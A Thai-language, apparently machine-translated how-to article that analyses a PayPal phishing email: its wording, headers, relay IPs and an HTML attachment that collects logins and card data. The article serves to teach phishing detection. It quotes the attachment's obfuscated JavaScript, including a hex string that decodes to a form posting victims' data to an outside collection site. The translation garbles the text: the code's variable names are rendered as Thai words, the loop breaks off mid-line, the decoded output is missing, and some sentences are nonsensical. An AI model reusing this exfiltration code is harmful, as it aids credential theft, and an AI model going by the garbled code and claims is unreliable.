โฮมเพจ » ทำอย่างไร » การรักษาความปลอดภัยออนไลน์ทำลายร่างกายของอีเมลหลอกลวง

    การรักษาความปลอดภัยออนไลน์ทำลายร่างกายของอีเมลหลอกลวง


    ในโลกทุกวันนี้ที่ข้อมูลของทุกคนออนไลน์ฟิชชิ่งเป็นหนึ่งในการโจมตีออนไลน์ที่ได้รับความนิยมและทำลายล้างสูงที่สุดเพราะคุณสามารถกำจัดไวรัสได้ตลอดเวลา นี่คือรายละเอียดของการโจมตีหนึ่งครั้งที่เราได้รับ.

    อย่าคิดว่ามันเป็นเพียงรายละเอียดการธนาคารของคุณที่มีความสำคัญหลังจากทั้งหมดหากมีคนควบคุมการเข้าสู่ระบบบัญชีของคุณพวกเขาไม่เพียง แต่รู้ข้อมูลที่มีอยู่ในบัญชีนั้น แต่ราคาต่อรองเป็นข้อมูลการเข้าสู่ระบบเดียวกัน บัญชี และหากพวกเขาประนีประนอมบัญชีอีเมลของคุณพวกเขาสามารถรีเซ็ตรหัสผ่านอื่น ๆ ทั้งหมดของคุณ.

    ดังนั้นนอกเหนือจากการรักษารหัสผ่านที่แข็งแกร่งและแตกต่างกันคุณจะต้องมองหาอีเมลปลอมที่ปลอมแปลงเป็นของจริงเสมอ ในขณะที่ความพยายามฟิชชิ่งส่วนใหญ่เป็นเรื่องที่ชำนาญ แต่บางคนก็ค่อนข้างมั่นใจดังนั้นจึงเป็นเรื่องสำคัญที่จะต้องเข้าใจวิธีการจดจำพวกมันในระดับพื้นผิวรวมถึงวิธีการทำงานภายใต้ประทุน.

    ภาพโดย asirap

    ตรวจสอบสิ่งที่อยู่ในสายตาธรรมดา

    อีเมลตัวอย่างของเราเช่นความพยายามฟิชชิ่งส่วนใหญ่“ แจ้งเตือน” คุณถึงกิจกรรมในบัญชี PayPal ของคุณซึ่งในสถานการณ์ปกติจะน่าตกใจ ดังนั้นการเรียกร้องให้ดำเนินการคือการยืนยัน / กู้คืนบัญชีของคุณโดยการส่งข้อมูลส่วนตัวทุกชิ้นที่คุณนึกถึง อีกครั้งนี่เป็นสูตรที่ค่อนข้างสวย.

    แม้ว่าจะมีข้อยกเว้นอยู่บ้าง แต่อีเมลฟิชชิ่งและอีเมลหลอกลวงทุกฉบับนั้นเต็มไปด้วยธงสีแดงในข้อความโดยตรง แม้ว่าข้อความนั้นน่าเชื่อถือคุณมักจะพบข้อผิดพลาดมากมายที่เกลื่อนไปทั่วเนื้อข้อความซึ่งระบุว่าข้อความนั้นไม่ถูกต้อง.

    เนื้อหาของข้อความ

    เมื่อเห็นอย่างรวดเร็วนี่เป็นอีเมลฟิชชิ่งที่ดีกว่าที่ฉันเคยเห็น ไม่มีข้อผิดพลาดการสะกดหรือไวยากรณ์และคำฟุ่มเฟือยอ่านตามสิ่งที่คุณอาจคาดหวัง อย่างไรก็ตามมีธงสีแดงเล็กน้อยที่คุณสามารถเห็นได้เมื่อคุณตรวจสอบเนื้อหาอีกเล็กน้อย.

    • “ Paypal” - กรณีที่ถูกต้องคือ“ PayPal” (ตัวอักษร P) คุณสามารถดูรูปแบบทั้งสองนี้ได้ในข้อความ บริษัท ต่าง ๆ ให้ความสำคัญกับการสร้างตราสินค้าเป็นอย่างมากดังนั้นจึงเป็นที่น่าสงสัยว่าบางสิ่งเช่นนี้จะผ่านกระบวนการพิสูจน์อักษร.
    • “ allow ActiveX” - คุณเคยเห็นธุรกิจที่ใช้เว็บที่ถูกกฎหมายขนาดเท่าไหร่ของ Paypal ใช้ส่วนประกอบที่เป็นกรรมสิทธิ์ซึ่งทำงานบนเบราว์เซอร์เดียวโดยเฉพาะเมื่อพวกเขาสนับสนุนเบราว์เซอร์หลายตัว? แน่นอนว่ามีบาง บริษัท ที่ทำอยู่ แต่นี่เป็นธงสีแดง.
    • “ ปลอดภัย” - สังเกตว่าคำนี้ไม่เข้าแถวตรงขอบกับข้อความย่อหน้าที่เหลือ แม้ว่าฉันจะยืดหน้าต่างออกไปอีกนิดหน่อย.
    • “ Paypal!” - ช่องว่างก่อนเครื่องหมายอัศเจรีย์ดูไม่น่าเชื่อ เป็นเพียงการเล่นโวหารอีกครั้งซึ่งฉันแน่ใจว่าจะไม่อยู่ในอีเมลที่ถูกต้อง.
    • “ แบบฟอร์มการอัปเดตบัญชี PayPal-pdf.htm” - ทำไม Paypal ถึงแนบ“ PDF” โดยเฉพาะอย่างยิ่งเมื่อพวกเขาสามารถลิงก์ไปยังหน้าบนเว็บไซต์ของพวกเขาได้ นอกจากนี้ทำไมพวกเขาจึงพยายามปลอมไฟล์ HTML เป็น PDF นี่คือธงสีแดงที่ใหญ่ที่สุดของพวกเขาทั้งหมด.

    ส่วนหัวของข้อความ

    เมื่อคุณดูที่ส่วนหัวของข้อความแฟล็กสีแดงอีกสองสามอันจะปรากฏขึ้น:

    • ที่อยู่จากคือ [email protected].
    • ที่อยู่ไปที่หายไป ฉันไม่ได้ลบข้อมูลนี้ออกมันไม่ได้เป็นส่วนหนึ่งของส่วนหัวของข้อความมาตรฐาน โดยทั่วไป บริษัท ที่มีชื่อของคุณจะปรับอีเมลให้เป็นส่วนตัว.

    สิ่งที่แนบมา

    เมื่อฉันเปิดสิ่งที่แนบมาคุณจะเห็นได้ทันทีว่ารูปแบบไม่ถูกต้องเนื่องจากขาดข้อมูลสไตล์ อีกครั้งทำไม PayPal ถึงส่งอีเมลแบบฟอร์ม HTML เมื่อพวกเขาสามารถให้ลิงก์แก่คุณบนเว็บไซต์ของพวกเขาได้?

    บันทึก: เราใช้โปรแกรมดูไฟล์แนบ HTML ของ Gmail ในตัว แต่เราขอแนะนำให้คุณอย่าเปิดไฟล์แนบจากสแกม ไม่เคย เคย พวกเขามักจะมีช่องโหว่ที่จะติดตั้งโทรจันบนพีซีของคุณเพื่อขโมยข้อมูลบัญชีของคุณ.

    เลื่อนลงมาอีกเล็กน้อยคุณจะเห็นว่าแบบฟอร์มนี้ถามไม่เพียง แต่สำหรับข้อมูลเข้าสู่ระบบ PayPal ของเรา แต่สำหรับข้อมูลธนาคารและบัตรเครดิตด้วย ภาพบางส่วนขาด.

    เห็นได้ชัดว่าความพยายามฟิชชิ่งนี้เกิดขึ้นหลังจากทุกสิ่งด้วยการโฉบ.

    รายละเอียดทางเทคนิค

    ในขณะที่มันควรจะค่อนข้างชัดเจนโดยอิงจากสิ่งที่เห็นได้ชัดว่านี่เป็นความพยายามฟิชชิ่ง แต่ตอนนี้เรากำลังจะทำลายการแต่งหน้าทางเทคนิคของอีเมลและดูว่าเราสามารถหาอะไรได้บ้าง.

    ข้อมูลจากเอกสารแนบ

    สิ่งแรกที่ต้องพิจารณาคือที่มา HTML ของแบบฟอร์มสิ่งที่แนบซึ่งเป็นสิ่งที่ส่งข้อมูลไปยังเว็บไซต์ปลอม.

    เมื่อดูแหล่งที่มาได้อย่างรวดเร็วลิงก์ทั้งหมดจะถูกต้องเนื่องจากพวกเขาชี้ไปที่ "paypal.com" หรือ "paypalobjects.com" ซึ่งทั้งสองอย่างถูกต้อง.

    ตอนนี้เรากำลังจะดูที่หน้าข้อมูลพื้นฐานบางอย่างที่ Firefox รวบรวมไว้บนหน้า.

    อย่างที่คุณเห็นกราฟิกบางส่วนถูกดึงมาจากโดเมน“ blessedtobe.com”,“ goodhealthpharmacy.com” และ“ pic-upload.de” แทนที่จะเป็นโดเมน PayPal ที่ถูกกฎหมาย.

    ข้อมูลจากส่วนหัวของอีเมล

    ต่อไปเราจะดูที่ส่วนหัวของข้อความอีเมลดิบ Gmail ทำให้สามารถใช้งานได้ผ่านตัวเลือกเมนูแสดงต้นฉบับบนข้อความ.

    ดูข้อมูลส่วนหัวของข้อความต้นฉบับคุณสามารถดูข้อความนี้ได้โดยใช้ Outlook Express 6 ฉันสงสัยว่า PayPal มีคนในทีมที่ส่งข้อความเหล่านี้ด้วยตนเองผ่านไคลเอนต์อีเมลที่ล้าสมัย.

    ตอนนี้ดูข้อมูลเส้นทางเราสามารถดูที่อยู่ IP ของทั้งผู้ส่งและเซิร์ฟเวอร์อีเมลที่ส่งต่อ.

    ที่อยู่ IP“ ผู้ใช้” เป็นผู้ส่งต้นฉบับ ทำการค้นหาข้อมูล IP อย่างรวดเร็วเราสามารถเห็น IP ที่ส่งอยู่ในประเทศเยอรมนี.

    และเมื่อเราดูที่เมลเซิร์ฟเวอร์ของรีเลย์ (mail.itak.at) ที่อยู่ IP เราจะเห็นได้ว่านี่คือ ISP ที่ตั้งอยู่ในประเทศออสเตรีย ฉันสงสัยว่า PayPal กำหนดเส้นทางอีเมลของพวกเขาโดยตรงผ่าน ISP ที่ใช้ออสเตรียเมื่อพวกเขามีเซิร์ฟเวอร์ฟาร์มขนาดใหญ่ซึ่งสามารถจัดการงานนี้ได้อย่างง่ายดาย.

    Data ไปที่ไหน?

    ดังนั้นเราจึงได้พิจารณาอย่างชัดเจนว่านี่คืออีเมลฟิชชิงและรวบรวมข้อมูลบางส่วนเกี่ยวกับที่มาของข้อความ แต่สิ่งที่เกี่ยวกับตำแหน่งที่ส่งข้อมูลของคุณ?

    หากต้องการดูสิ่งนี้เราต้องบันทึกสิ่งที่แนบ HTM ก่อนทำเดสก์ท็อปของเราและเปิดในโปรแกรมแก้ไขข้อความ เลื่อนดูทุกอย่างดูเหมือนจะเป็นไปตามลำดับยกเว้นเมื่อเราไปถึงบล็อก Javascript ที่น่าสงสัย.

    การแยกแหล่งที่มาเต็มของบล็อกสุดท้ายของ Javascript เราเห็น:


    // ลิขสิทธิ์© 2005 Voormedia - WWW.VOORMEDIA.COM
    var ฉัน, y, x =” 3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e”; Y =” สำหรับ (i = 0; ฉัน

    เมื่อใดก็ตามที่คุณเห็นสตริงตัวอักษรขนาดใหญ่และตัวเลขสุ่มปรากฏอยู่ในบล็อก Javascript มักเป็นสิ่งที่น่าสงสัย ดูรหัสตัวแปร“ x” ถูกตั้งค่าเป็นสตริงขนาดใหญ่นี้แล้วถอดรหัสเป็นตัวแปร“ y” ผลลัพธ์สุดท้ายของตัวแปร“ y” จะถูกเขียนลงในเอกสารเป็น HTML.

    เนื่องจากสตริงขนาดใหญ่ทำจากตัวเลข 0-9 และตัวอักษร a-f จึงมีการเข้ารหัสส่วนใหญ่ผ่านการแปลง ASCII เป็น Hex แบบธรรมดา:

    3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e

    แปลเป็น:

    ไม่ใช่เรื่องบังเอิญที่สิ่งนี้จะแปลงเป็นแท็กแบบฟอร์ม HTML ที่ถูกต้องซึ่งจะส่งผลลัพธ์ไม่ใช่ PayPal แต่ไปยังไซต์โกง.

    นอกจากนี้เมื่อคุณดูซอร์สโค้ด HTML ของฟอร์มคุณจะเห็นว่าแท็กฟอร์มนี้ไม่สามารถมองเห็นได้เพราะสร้างขึ้นแบบไดนามิกผ่าน Javascript นี่เป็นวิธีที่ชาญฉลาดในการซ่อนสิ่งที่ HTML กำลังทำอยู่หากใครบางคนเพียงแค่ดูแหล่งที่มาที่สร้างขึ้นของสิ่งที่แนบมา.

    ใช้ whois อย่างรวดเร็วในเว็บไซต์ที่ละเมิดเราสามารถเห็นว่านี่เป็นโดเมนที่โฮสต์ที่โฮสต์เว็บยอดนิยม 1 และ 1.

    สิ่งที่โดดเด่นคือโดเมนใช้ชื่อที่อ่านได้ (ตรงข้ามกับบางอย่างเช่น "dfh3sjhskjhw.net") และโดเมนได้รับการจดทะเบียนเป็นเวลา 4 ปี ด้วยเหตุนี้ฉันเชื่อว่าโดเมนนี้ถูกขโมยและใช้เป็นเบี้ยในความพยายามฟิชชิ่งนี้.

    ความเห็นถากถางดูถูกคือการป้องกันที่ดี

    เมื่อพูดถึงการออนไลน์อย่างปลอดภัยมันไม่เคยเจ็บปวดที่จะมีความเห็นถากถางดูถูก.

    ในขณะที่ฉันแน่ใจว่ามีการตั้งค่าสถานะสีแดงเพิ่มเติมในอีเมลตัวอย่างสิ่งที่เราได้กล่าวไว้ข้างต้นคือตัวบ่งชี้ที่เราเห็นหลังจากการตรวจสอบเพียงไม่กี่นาที สมมุติฐานหากระดับพื้นผิวของอีเมลเลียนแบบคู่แท้ 100% การวิเคราะห์ทางเทคนิคจะยังคงเปิดเผยลักษณะที่แท้จริงของมัน นี่คือสาเหตุที่เป็นการนำเข้าเพื่อให้สามารถตรวจสอบทั้งสิ่งที่คุณสามารถและไม่เห็น.